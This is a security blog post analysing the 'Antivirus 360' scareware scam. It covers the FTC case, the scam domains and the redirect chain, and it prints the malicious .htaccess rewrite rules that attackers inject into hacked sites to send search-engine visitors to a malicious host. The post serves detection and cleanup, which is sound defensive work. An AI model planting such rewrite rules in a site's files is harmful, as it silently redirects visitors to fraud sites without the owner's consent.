Antivirus 360 redirection exploit

This is a new post in the series about the Antivirus 2009 .htaccess exploit. I want to share some new information on the topic.

Federal Trade Commission vs. scammers

The Federal Trade Commission filed the complaint against the organizers of the bogus computer scanners scam on December 2, 2008 in the U.S. District Court for the District of Maryland.

According to the FTC, the scheme has tricked more than one million consumers into buying computer security products such as WinFixer, WinAntivirus, DriveCleaner, ErrorSafe, and XP Antivirus.

This is the answer why hackers break into even very small sites – they have a way to monetize your site’s vulnerability. And more than $40,000,000 in sales is well worth the trouble.

Now it’s Antivirus 360

Meanwhile, the malicious scheme is still live. Every day scammers register new domains and change servers.

• protectedgoclicks .com
• internetprotectionsystem .com
• onlineantivirus-scanner .com
• onlinesecurity-scan .com
• onlinemalwarescanner .com
• powerantivirusscan .com (created: 2008-12-17)
• pro-antivirus-scanner .com (created: 2008-12-17)

They have also changed the name of their “scanner”. Now it is called Antivirus 360. They just replaced 2009 with 360. Everything else is identical.

New .htaccess code

I also noticed that hackers started to insert a slightly modified code into .htaccess files.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://alamaat.com/video/wmv.php [R,L]

It looks like they are no longer interested in Ask.com and Altavista.com traffic. Another change is the first level redirection goes to some compromised Pakistani site.

The whole chain of redirects may look like this:

302 -> http://alamaat .com/ video/wmv.php
302 -> http://ukr-mova .info/flash /go.php?sid=1
302 -> http://protectedgoclicks .com/ soft.php?aid=0553&d=1&product=XPA&refer=d58bf6d15
302 -> http://onlineantivirus-scanner .com/360/ 1/freescan.php?nu=880553
302 -> http://onlineantivirus-scanner .com/360/ 1/en/freescan.php?sid=880553

This new version of the exploit cannot be currently detected by Unmask Parasites. I’m working on the update. Meanwhile, you can check your .htaccess file or try to click on search engine results (I suggest that you temporarily disable javascript) if you suspect this exploit.

Alternative redirections

Another new feature is the intermediary ukr-mova script now redirects Russian-speaking visitors to a Russian porn site that asks to send an SMS to obtain full access to its resources. This way they are trying to monetize ex-USSR visitors which are less likely to pay for software with credit cards.

Prevent re-infections

In conclusion, I’d like to warn against half-measures. I’ve recently seen a few sites that got reinfected shorty after removing this exploit.

Deleting .htaccess is not enough! You should also write-protect your server files, change passwords, update scripts, remove suspicious files, etc. Check the How to prevent re-infection section in my previous post for more details.